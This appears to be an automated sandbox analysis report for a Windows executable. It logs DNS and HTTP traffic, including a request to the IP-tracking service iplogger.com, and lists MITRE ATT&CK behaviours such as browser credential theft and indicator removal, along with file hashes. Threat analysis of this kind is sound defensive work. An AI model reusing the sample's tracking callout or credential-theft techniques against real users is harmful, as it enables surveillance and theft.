Remote address:8.8.8.8:53Requestiplogger.comIN AResponseiplogger.comIN A104.21.76.57iplogger.comIN A172.67.188.178
-
GEThttps://iplogger.com/1QhhX456f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exeRemote address:104.21.76.57:443RequestGET /1QhhX4 HTTP/1.1
Referer: 74B92775;2.22
Host: iplogger.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: 443237163563470739=1; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
Set-Cookie: clhf03028ja=212.102.63.147; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.41068267822265625
expires: Tue, 25 Mar 2025 13:04:15 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvMZ8sf8%2Fg%2FggSbvhnGSLS3p6CMh0vksF%2FA0BhByDmKj3txb%2Fb4WNIkFSNr82yq13vDkQBD9ok94gv7newK4GrXH3fxwgW6096s9xpL6osOpgIkNDfX8VWGkGVUR8wM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925e9cf11db2bec9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46417&min_rtt=21362&rtt_var=54240&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3133&recv_bytes=411&delivery_rate=152334&cwnd=253&unsent_bytes=0&cid=167ad39131ee6508&ts=356&x=0"
-
Remote address:8.8.8.8:53Requestc.pki.googIN AResponsec.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.227
-
GEThttp://c.pki.goog/r/gsr1.crl56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exeRemote address:142.250.179.227:80RequestGET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 25 Mar 2025 12:31:21 GMT
Expires: Tue, 25 Mar 2025 13:21:21 GMT
Cache-Control: public, max-age=3000
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
Age: 1974
-
Remote address:142.250.179.227:80RequestGET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog
ResponseHTTP/1.1 200 OK
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 25 Mar 2025 12:19:56 GMT
Expires: Tue, 25 Mar 2025 13:09:56 GMT
Cache-Control: public, max-age=3000
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
Age: 2659
-
104.21.76.57:443https://iplogger.com/1QhhX4tls, http56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe859 B 5.2kB 10 11
HTTP Request
GET https://iplogger.com/1QhhX4HTTP Response
200 -
142.250.179.227:80http://c.pki.goog/r/r4.crlhttp56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe600 B 5.0kB 8 6
HTTP Request
GET http://c.pki.goog/r/gsr1.crlHTTP Response
200HTTP Request
GET http://c.pki.goog/r/r4.crlHTTP Response
200
-
58 B 90 B 1 1
DNS Request
iplogger.com
DNS Response
104.21.76.57172.67.188.178
-
56 B 107 B 1 1
DNS Request
c.pki.goog
DNS Response
142.250.179.227
MITRE ATT&CK Enterprise v15
Defense Evasion
Direct Volume Access
1Indicator Removal
3File Deletion
3Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD529abe2cf61968275a38bcf735c875d5d
SHA14386674a153df8a4a1dc81bcf976ffae29299b2f
SHA256463c885a5b5cf4b8447e11fddf5b2028c8adf0974f6bb3178454bf26bb3082e6
SHA512261193ffe16866ed90f20ef293876c619393ce7e29a75cfba87badd2f34f2bed8338728a0a0ce505b6817adab04e9e22826cdd42f7917b434c1b978f07dc5871